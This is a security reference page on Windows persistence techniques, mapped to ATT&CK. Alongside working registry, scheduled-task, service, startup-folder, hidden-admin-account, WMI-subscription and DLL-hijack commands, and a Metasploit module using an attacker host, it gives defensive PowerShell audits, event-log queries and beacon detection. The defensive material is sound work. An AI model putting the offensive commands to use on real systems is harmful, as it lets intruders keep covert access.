Windows Persistence

Overview

Windows persistence abuses registry autorun keys, scheduled tasks, services, startup folders, and WMI subscriptions to maintain access. SYSTEM or administrator privileges unlock the most reliable methods, but many techniques work with standard user access. Choose methods that survive reboots and blend with normal Windows activity.

ATT&CK Mapping

  • Tactic: TA0003 - Persistence
  • Techniques:
      • T1053.005 - Scheduled Task/Job: Scheduled Task
      • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
      • T1543.003 - Create or Modify System Process: Windows Service
      • T1136.001 - Create Account: Local Account

Prerequisites

  • Shell access to the target (user or administrator)
  • Payload on disk or in-memory execution capability

Techniques

Registry Run Keys

Programs listed in Run keys execute every time a user logs in:

:: Current user — no admin required
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\Users\Public\payload.exe" /f

:: All users — requires admin
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f

# PowerShell equivalent
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Update" -Value "C:\Users\Public\payload.exe"

Other autorun registry locations:

:: RunOnce — executes once then deletes itself
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Update /t REG_SZ /d "C:\Users\Public\payload.exe" /f

:: Winlogon — runs at login (requires admin)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\Temp\payload.exe" /f

Scheduled Task Persistence

:: Create scheduled task that runs at logon (requires admin for SYSTEM)
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc onlogon /ru SYSTEM /f

:: Run every 5 minutes
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc minute /mo 5 /ru SYSTEM /f

:: Run at startup
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc onstart /ru SYSTEM /f

# PowerShell — create scheduled task
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\payload.exe"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
Register-ScheduledTask -TaskName "SystemUpdate" -Action $action -Trigger $trigger -Principal $principal

User-level task (no admin required):

schtasks /create /tn "UserUpdate" /tr "C:\Users\Public\payload.exe" /sc onlogon /f

Windows Service (Requires Admin)

:: Create a service that runs as SYSTEM on boot
sc create UpdateService binpath= "C:\Windows\Temp\payload.exe" start= auto obj= LocalSystem
sc start UpdateService

:: Query the service
sc query UpdateService

:: Delete when done
sc delete UpdateService

# PowerShell — create service
New-Service -Name "UpdateService" -BinaryPathName "C:\Windows\Temp\payload.exe" -StartupType Automatic
Start-Service -Name "UpdateService"

Startup Folder

Drop a payload or shortcut in the startup folder:

:: Current user startup folder
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"

:: All users startup folder (requires admin)
copy payload.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"

# PowerShell — create shortcut in startup
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk")
$Shortcut.TargetPath = "C:\Users\Public\payload.exe"
$Shortcut.Save()
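An audit script for the four autostart locations covered so far (Run/RunOnce and Winlogon values, scheduled task actions, service binaries, and startup-folder entries). This is an added example, not code from the original page: it resolves the program behind each entry and flags it when it lives in a user-writable directory, is missing from disk, or lacks a valid Authenticode signature. The list of writable roots and the flagging heuristics are assumptions to tune for your environment; run it elevated to see HKLM, SYSTEM tasks and the all-users startup folder.

```powershell
# Added example (not from the original page): audit the autostart locations used in the
# four sections above and flag entries whose program lives in a user-writable directory,
# is missing, or has no valid Authenticode signature. Run elevated for full coverage.

# Directories a standard user can usually write to (assumed list; extend for your estate)
$WritableRoots = @("$env:SystemDrive\Users", "$env:SystemDrive\ProgramData",
                   "$env:SystemRoot\Temp", "$env:SystemRoot\Tasks")

function Get-ExecutablePath {
    # Extract the program from a command line such as "C:\Program Files\App\app.exe" --flag
    # or C:\Windows\system32\svchost.exe -k netsvcs
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -gt 1) { return $cl.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($cl, '^(.+?\.(exe|dll|cmd|bat|ps1|vbs|js))(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cl -split '\s+')[0]
}

function Test-SuspiciousBinary {
    # Returns the reasons a program deserves a look; no output means nothing odd was seen
    param([string]$Path)
    if (-not $Path) { return }
    if (-not [IO.Path]::IsPathRooted($Path)) {           # e.g. Shell = explorer.exe
        $cmd = Get-Command $Path -ErrorAction SilentlyContinue | Select-Object -First 1
        if ($cmd -and $cmd.Source) { $Path = $cmd.Source } else { return "bare name '$Path' not found on PATH" }
    }
    $reasons = @()
    foreach ($root in $WritableRoots) {
        if ($Path.StartsWith($root, 'OrdinalIgnoreCase')) { $reasons += "user-writable location ($root)"; break }
    }
    if (Test-Path -LiteralPath $Path) {
        $sig = Get-AuthenticodeSignature -FilePath $Path
        if ($sig.Status -ne 'Valid') { $reasons += "signature $($sig.Status)" }
    } else {
        $reasons += 'file missing on disk'
    }
    return $reasons
}

function Get-AutorunFindings {
    $findings = [System.Collections.Generic.List[object]]::new()
    $record = { param($Source, $Name, $Cmd)
        $why = Test-SuspiciousBinary (Get-ExecutablePath $Cmd)
        if ($why) { $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Command = $Cmd; Reasons = ($why -join '; ') }) }
    }

    # 1. Run / RunOnce values for the current user and the machine
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        foreach ($p in (Get-ItemProperty -Path $k).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }                 # PSPath, PSParentPath, ...
            & $record $k $p.Name ([string]$p.Value)
        }
    }
    # 2. Winlogon Userinit / Shell are comma-separated lists; anything appended is suspect
    $wl = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
    foreach ($v in (@($wl.Userinit -split ',') + @($wl.Shell -split ','))) {
        if ($v.Trim()) { & $record 'Winlogon' 'Userinit/Shell' $v.Trim() }
    }
    # 3. Scheduled task actions
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            if ($a.Execute) { & $record "Task $($t.TaskPath)" $t.TaskName "$($a.Execute) $($a.Arguments)" }
        }
    }
    # 4. Service binaries
    foreach ($s in Get-CimInstance Win32_Service) { & $record 'Service' $s.Name $s.PathName }
    # 5. Startup folders, resolving .lnk shortcuts to their targets
    $wsh = New-Object -ComObject WScript.Shell
    foreach ($f in "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
                   "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup") {
        foreach ($item in Get-ChildItem -Path $f -File -ErrorAction SilentlyContinue) {
            $target = if ($item.Extension -eq '.lnk') { $wsh.CreateShortcut($item.FullName).TargetPath } else { $item.FullName }
            & $record 'Startup folder' $item.Name $target
        }
    }
    return $findings
}

Get-AutorunFindings | Format-Table -AutoSize -Wrap
```

Every entry from the sections above would appear in this output: the Run and RunOnce values and the Winlogon Userinit addition point at C:\Users\Public or C:\Windows\Temp, the SystemUpdate task and UpdateService service run an unsigned binary from C:\Windows\Temp, and the Update.lnk shortcut resolves to C:\Users\Public\payload.exe. Baseline the output on a clean build so that later runs can be diffed.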

Add Local User

:: Create new local admin (requires admin)
net user backdoor Password123! /add
net localgroup Administrators backdoor /add

:: Hide the user from the logon screen (accounts with RID >= 1000 are listed there by default)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0 /f

Enable RDP for the new user:

net localgroup "Remote Desktop Users" backdoor /add
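The matching audit for this section, as an added example rather than code from the page: it lists local accounts that are in Administrators outside an allowlist, that are in Remote Desktop Users, or that are hidden through the SpecialAccounts\UserList value shown above, and includes a remediation function that makes a hidden account visible again. The $ApprovedAdmins allowlist is a constructed placeholder; the LocalAccounts cmdlets it uses ship with Windows 10 / Server 2016 and later.

```powershell
# Added example (not from the original page): audit local accounts for the indicators of
# the technique above: Administrators / Remote Desktop Users membership outside an
# allowlist, and accounts hidden from the logon screen through SpecialAccounts\UserList.
$ApprovedAdmins = 'Administrator', 'ITAdmin'     # constructed allowlist; replace with yours
$UserListKey = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

function Get-HiddenLocalAccounts {
    # A name with a DWORD value of 0 under UserList is suppressed from the logon screen
    if (-not (Test-Path $UserListKey)) { return @() }
    (Get-ItemProperty -Path $UserListKey).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and [int]$_.Value -eq 0 } |
        ForEach-Object { $_.Name }
}

function Get-LocalGroupMemberNames {
    param([string]$Group)
    # Members come back as COMPUTER\name or DOMAIN\name; keep only the bare name
    Get-LocalGroupMember -Group $Group -ErrorAction SilentlyContinue |
        ForEach-Object { ($_.Name -split '\\')[-1] }
}

function Get-LocalAccountFindings {
    $hidden = @(Get-HiddenLocalAccounts)
    $admins = @(Get-LocalGroupMemberNames 'Administrators')
    $rdp    = @(Get-LocalGroupMemberNames 'Remote Desktop Users')
    foreach ($u in Get-LocalUser) {
        $rid = [int](($u.SID.Value -split '-')[-1])      # RID < 1000 means a built-in account
        $flags = @()
        if ($admins -contains $u.Name -and $ApprovedAdmins -notcontains $u.Name) { $flags += 'unapproved local admin' }
        if ($hidden -contains $u.Name) { $flags += 'hidden from logon screen' }
        if ($rdp -contains $u.Name) { $flags += 'in Remote Desktop Users' }
        if ($flags) {
            [pscustomobject]@{
                Name = $u.Name; RID = $rid; BuiltIn = ($rid -lt 1000); Enabled = $u.Enabled
                PasswordLastSet = $u.PasswordLastSet; LastLogon = $u.LastLogon; Flags = ($flags -join '; ')
            }
        }
    }
}

function Remove-LogonScreenHide {
    # Remediation: make a hidden account visible again. The account itself is left alone so
    # it can be investigated first; Disable-LocalUser handles the account when that is decided.
    param([Parameter(Mandatory)][string]$Name)
    Remove-ItemProperty -Path $UserListKey -Name $Name -ErrorAction Stop
}

Get-LocalAccountFindings | Format-Table -AutoSize
```

On a host where the commands above were run, the output would show the backdoor account with RID 1000 or higher, all three flags set, and a PasswordLastSet timestamp close to the time of the intrusion.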

WMI Event Subscription (Requires Admin)

WMI persistence triggers a payload based on system events:

# Create WMI event subscription — runs payload on startup
$FilterArgs = @{
    Name = 'UpdateFilter'
    EventNameSpace = 'root\CIMv2'
    QueryLanguage = 'WQL'
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120 AND TargetInstance.SystemUpTime < 180"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs

$ConsumerArgs = @{
    Name = 'UpdateConsumer'
    CommandLineTemplate = 'C:\Windows\Temp\payload.exe'
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs

$BindingArgs = @{
    Filter = $Filter
    Consumer = $Consumer
}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs

Query existing WMI subscriptions:

Get-WmiObject -Namespace root\subscription -Class __EventFilter
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding
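Listing the three classes separately leaves the reviewer to match them up by hand. The following added example (not from the original page) walks each binding in root\subscription and prints the filter query beside the command or script its consumer runs, so each persistence chain appears as one record, and includes a function that removes a chain in the right order. It uses the CIM cmdlets; the assumption that a stock Windows install carries exactly one binding, the SCM Event Log Filter, is used only to mark that row.

```powershell
# Added example (not from the original page): correlate WMI bindings with their filter
# and consumer so that each subscription chain shows up as one record.
$Namespace = 'root\subscription'

function Get-RefName {
    # Binding properties refer to the filter/consumer either as an object (CIM cmdlets) or
    # as a path string such as __EventFilter.Name="UpdateFilter" (Get-WmiObject)
    param($Ref)
    if ($Ref -is [string]) { if ($Ref -match 'Name="([^"]+)"') { return $Matches[1] } else { return $Ref } }
    return $Ref.Name
}

function Get-WmiSubscriptionChains {
    $filters = @(Get-CimInstance -Namespace $Namespace -ClassName __EventFilter)
    $consumers = @()
    foreach ($class in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer', 'NTEventLogEventConsumer') {
        $consumers += @(Get-CimInstance -Namespace $Namespace -ClassName $class -ErrorAction SilentlyContinue)
    }
    foreach ($b in Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $cName | Select-Object -First 1
        # What actually runs when the filter fires: a command line, an executable, or an inline script
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate }
                   elseif ($c.ExecutablePath) { $c.ExecutablePath }
                   elseif ($c.ScriptText) { $s = $c.ScriptText -replace '\s+', ' '; $s.Substring(0, [Math]::Min(120, $s.Length)) }
                   else { '<no command>' }
        [pscustomobject]@{
            Filter       = $fName
            Query        = $f.Query
            Consumer     = $cName
            ConsumerType = $c.CimClass.CimClassName
            Payload      = $payload
            # Assumed baseline: a default install has one binding, the SCM Event Log Filter
            StockBinding = ($fName -eq 'SCM Event Log Filter')
        }
    }
}

function Remove-WmiSubscriptionChain {
    # Remediation: delete the binding first, then the now-orphaned filter and consumer
    param([Parameter(Mandatory)][string]$FilterName, [Parameter(Mandatory)][string]$ConsumerName)
    Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding |
        Where-Object { (Get-RefName $_.Filter) -eq $FilterName } | Remove-CimInstance
    Get-CimInstance -Namespace $Namespace -ClassName __EventFilter |
        Where-Object Name -eq $FilterName | Remove-CimInstance
    Get-CimInstance -Namespace $Namespace -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        Where-Object Name -eq $ConsumerName | Remove-CimInstance
}

Get-WmiSubscriptionChains | Format-List
```

For the subscription created above the record would show UpdateFilter with the SystemUpTime query, UpdateConsumer of type CommandLineEventConsumer, and C:\Windows\Temp\payload.exe as the payload, with StockBinding false. Any row that is not the stock binding and has no known owner is a finding.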

DLL Hijacking for Persistence

Place a malicious DLL in a location where a legitimate program searches before finding the real DLL:

:: Find DLL search order issues (use Process Monitor to identify)
:: Common targets: services, scheduled tasks, or autostart programs
:: that load DLLs from writable directories

:: Copy malicious DLL to writable directory in the search path
copy malicious.dll "C:\Program Files\VulnerableApp\missing.dll"
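The defensive counterpart to this section is to find the load directories a low-privilege user can write to before anyone else does. The following added example (not from the original page) collects the directory of every service binary plus the machine-wide PATH and reports those where Users, Authenticated Users, Everyone or INTERACTIVE hold a write-class allow ACE. The identity list and the set of rights treated as "write" are assumptions; the ACE check is a heuristic that ignores deny entries, so confirm each hit before changing permissions.

```powershell
# Added example (not from the original page): hardening check for the search-order weakness
# above. Reports load directories where a low-privilege identity can create or modify files.
# Identity names below are the English ones; they are localized on non-English systems.
$LowPrivIdentities = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE'
$WriteRights = [System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, WriteAttributes, WriteExtendedAttributes, ChangePermissions, TakeOwnership'

function Test-LowPrivWritable {
    # Heuristic: an Allow ACE for a low-privilege identity granting a write-class right or
    # GENERIC_WRITE / GENERIC_ALL. Deny ACEs are not evaluated, so confirm hits by hand.
    param([string]$Directory)
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band [int]$WriteRights) -ne 0) { return $true }
        if (($rights -band 0x40000000) -ne 0 -or ($rights -band 0x10000000) -ne 0) { return $true }
    }
    return $false
}

function Get-LowPrivWritableLoadDirectories {
    $dirs = [System.Collections.Generic.HashSet[string]]::new([StringComparer]::OrdinalIgnoreCase)
    # The machine-wide PATH is what services and SYSTEM tasks resolve DLLs against
    foreach ($d in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';')) {
        if ($d.Trim()) { [void]$dirs.Add($d.Trim()) }
    }
    # The directory of each service binary is searched first for any DLL the binary loads
    foreach ($s in Get-CimInstance Win32_Service) {
        if ($s.PathName -match '^"?(?<exe>[^"]+?\.exe)') { [void]$dirs.Add((Split-Path $Matches.exe -Parent)) }
    }
    foreach ($d in $dirs) {
        if (-not (Test-Path -LiteralPath $d -PathType Container)) { continue }
        try { $writable = Test-LowPrivWritable $d } catch { continue }
        if ($writable) { [pscustomobject]@{ Directory = $d; LowPrivWritable = $true } }
    }
}

Get-LowPrivWritableLoadDirectories | Format-Table -AutoSize
```

A directory that appears here and is owned by a third-party installer should have its ACL tightened so that only Administrators and SYSTEM can write to it; a PATH entry that no longer exists or is user-writable should simply be removed from the system PATH.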

Metasploit Persistence Modules

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# From msfconsole — install persistence via local exploit module
use exploit/windows/local/persistence
set SESSION <session_id>
set LHOST <attacker_ip>
run

Detection Methods

Host-Based Detection

  • Unexpected values in Run/RunOnce registry keys
  • Unknown scheduled tasks (particularly those running as SYSTEM)
  • Services with unusual binary paths or descriptions
  • Files in startup folders that don't match installed software
  • WMI event subscriptions (__EventFilter, CommandLineEventConsumer)
  • New local user accounts, especially those in the Administrators group
  • Hidden user accounts in the SpecialAccounts registry key
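The indicators above each have a corresponding Windows event. The following added example (not from the original page) pulls those events for the last 24 hours and reduces each to one line: Security 4698 (task created), 4697 and System 7045 (service installed), 4720 (user created), 4732 (member added to a local group), and Sysmon 13, 19, 20 and 21 for registry writes to the autorun keys and WMI filter, consumer and binding creation. It assumes the Security audit policy covers those IDs and that Sysmon is installed with registry and WMI logging configured; the field names used are the standard ones for each event.

```powershell
# Added example (not from the original page): collect the events behind the host-based
# indicators above and summarize each one. Security IDs need the matching audit policy;
# 7045 is always written; the Sysmon IDs assume Sysmon with registry and WMI rules.
$Since = (Get-Date).AddHours(-24)

$Watch = @(
    @{ Log = 'Security'; Id = 4698; What = 'Scheduled task created' }
    @{ Log = 'Security'; Id = 4697; What = 'Service installed (Security)' }
    @{ Log = 'System';   Id = 7045; What = 'Service installed (SCM)' }
    @{ Log = 'Security'; Id = 4720; What = 'Local user created' }
    @{ Log = 'Security'; Id = 4732; What = 'Member added to local group' }
    @{ Log = 'Microsoft-Windows-Sysmon/Operational'; Id = 13; What = 'Registry value set' }
    @{ Log = 'Microsoft-Windows-Sysmon/Operational'; Id = 19; What = 'WMI EventFilter created' }
    @{ Log = 'Microsoft-Windows-Sysmon/Operational'; Id = 20; What = 'WMI EventConsumer created' }
    @{ Log = 'Microsoft-Windows-Sysmon/Operational'; Id = 21; What = 'WMI binding created' }
)

# Sysmon 13 is noisy; keep only writes to the autorun keys covered on this page
$AutorunKeyPattern = 'CurrentVersion\\(Run|RunOnce)\\|Winlogon\\(Userinit|Shell|SpecialAccounts)'

function Get-EventFields {
    # Flatten an event's EventData into a name -> value hashtable
    param($Event)
    $xml = [xml]$Event.ToXml()
    $h = @{}
    foreach ($d in $xml.Event.EventData.Data) { if ($d.Name) { $h[$d.Name] = $d.'#text' } }
    return $h
}

function Get-PersistenceEvents {
    foreach ($w in $Watch) {
        $events = Get-WinEvent -FilterHashtable @{ LogName = $w.Log; Id = $w.Id; StartTime = $Since } -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            $f = Get-EventFields $e
            if ($w.Id -eq 13 -and $f.TargetObject -notmatch $AutorunKeyPattern) { continue }
            $detail = switch ($w.Id) {
                4698 { "$($f.SubjectUserName) created $($f.TaskName)" }
                4697 { "$($f.ServiceName) -> $($f.ServiceFileName) by $($f.SubjectUserName)" }
                7045 { "$($f.ServiceName) -> $($f.ImagePath) (start: $($f.StartType))" }
                4720 { "$($f.SubjectUserName) created user $($f.TargetUserName)" }
                4732 { "$($f.MemberName) / $($f.MemberSid) added to $($f.TargetUserName) by $($f.SubjectUserName)" }
                13   { "$($f.Image) set $($f.TargetObject) = $($f.Details)" }
                default { "$($f.Operation): $((@($f.Name, $f.Filter, $f.Consumer) -ne $null) -join ' ') by $($f.User)" }
            }
            [pscustomobject]@{ Time = $e.TimeCreated; Id = $w.Id; What = $w.What; Detail = $detail }
        }
    }
}

Get-PersistenceEvents | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
```

Running this after the commands in the Techniques section would yield, among others, a 4698 for SystemUpdate, a 7045 for UpdateService pointing at C:\Windows\Temp\payload.exe, a 4720 and a 4732 for the backdoor account, a Sysmon 13 for the Run value named Update, and Sysmon 19/20/21 for UpdateFilter and UpdateConsumer.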

Network-Based Detection

  • Periodic outbound connections to the same external IP (callback-based persistence)
  • Connections from system processes that don't normally make outbound requests
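Both network indicators above can be checked from connection records such as Sysmon event 3 or a host firewall log. The following added example (not from the original page) runs a beaconing heuristic over a constructed sample: it groups connections by process and destination, measures how regular the gaps between connections are (standard deviation divided by mean), and separately flags processes under C:\Windows that are not on an allowlist of processes expected to talk out. The record layout, the allowlist and the thresholds are assumptions; the sample log is constructed, not captured.

```powershell
# Added example (not from the original page): beaconing and unexpected-process heuristic
# over connection records. The sample below is constructed; layout is time,process,dst_ip,dst_port.
$SampleLog = @'
2024-05-01T10:00:02Z,C:\Windows\Temp\payload.exe,198.51.100.7,443
2024-05-01T10:05:01Z,C:\Windows\Temp\payload.exe,198.51.100.7,443
2024-05-01T10:10:03Z,C:\Windows\Temp\payload.exe,198.51.100.7,443
2024-05-01T10:15:00Z,C:\Windows\Temp\payload.exe,198.51.100.7,443
2024-05-01T10:20:02Z,C:\Windows\Temp\payload.exe,198.51.100.7,443
2024-05-01T10:01:10Z,C:\Program Files\Mozilla Firefox\firefox.exe,203.0.113.9,443
2024-05-01T10:01:12Z,C:\Program Files\Mozilla Firefox\firefox.exe,203.0.113.9,443
2024-05-01T10:07:45Z,C:\Program Files\Mozilla Firefox\firefox.exe,203.0.113.9,443
2024-05-01T10:33:05Z,C:\Program Files\Mozilla Firefox\firefox.exe,203.0.113.9,443
2024-05-01T10:02:00Z,C:\Windows\System32\spoolsv.exe,192.0.2.55,8080
'@

# Windows processes that legitimately make outbound connections (assumed list; tune per estate)
$ExpectedOutbound = 'svchost.exe', 'lsass.exe', 'wuauclt.exe', 'msedge.exe', 'firefox.exe', 'chrome.exe', 'outlook.exe'
$MinConnections = 4      # fewer samples give no meaningful interval statistics (assumed threshold)
$MaxJitter      = 0.2    # stddev/mean of the gaps; interactive traffic is far above this (assumed threshold)

function ConvertFrom-ConnLog {
    param([string]$Text)
    $Text -split "`r?`n" | Where-Object { $_ -match '\S' } | ForEach-Object {
        $t, $p, $ip, $port = $_ -split ','
        [pscustomobject]@{ Time = [datetime]::Parse($t, $null, 'AdjustToUniversal'); Process = $p; Dst = "$ip`:$port" }
    }
}

function Get-BeaconCandidates {
    param([string]$LogText)
    $records = ConvertFrom-ConnLog $LogText
    foreach ($g in ($records | Group-Object Process, Dst)) {
        $proc = $g.Group[0].Process
        $unexpected = ($proc -like 'C:\Windows\*') -and ($ExpectedOutbound -notcontains (Split-Path $proc -Leaf))
        $periodic = $false; $meanOut = $null; $jitterOut = $null
        if ($g.Count -ge $MinConnections) {
            $times = $g.Group.Time | Sort-Object
            $gaps = for ($i = 1; $i -lt $times.Count; $i++) { ($times[$i] - $times[$i - 1]).TotalSeconds }
            $mean = ($gaps | Measure-Object -Average).Average
            $sd = [Math]::Sqrt((($gaps | ForEach-Object { ($_ - $mean) * ($_ - $mean) } | Measure-Object -Sum).Sum) / $gaps.Count)
            $jitter = $sd / $mean
            $periodic = $jitter -le $MaxJitter
            $meanOut = [Math]::Round($mean, 1); $jitterOut = [Math]::Round($jitter, 3)
        }
        if ($periodic -or $unexpected) {
            [pscustomobject]@{ Process = $proc; Destination = $g.Group[0].Dst; Count = $g.Count
                               MeanGapSec = $meanOut; Jitter = $jitterOut
                               Periodic = $periodic; UnexpectedProcess = $unexpected }
        }
    }
}

Get-BeaconCandidates $SampleLog | Format-Table -AutoSize
```

On the constructed sample the payload.exe group is reported with a mean gap of about 300 seconds and jitter near 0.007 (periodic, and also an unexpected process under C:\Windows\Temp), spoolsv.exe is reported once as an unexpected outbound process, and the Firefox connections are dropped because their gaps are irregular. The 5-minute task shown in the Scheduled Task section is exactly the pattern this catches; raise $MinConnections and lower $MaxJitter on busy hosts to trade recall for precision.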

Mitigation Strategies

  • Monitor autorun locations — audit registry Run keys, scheduled tasks, services, and startup folders
  • Application whitelisting — prevent unauthorized executables from running
  • WMI subscription auditing — monitor for new event filters and consumers
  • Least privilege — limit the number of users with local admin rights
  • Account monitoring — alert on new local account creation

References

MITRE ATT&CK - https://attack.mitre.org/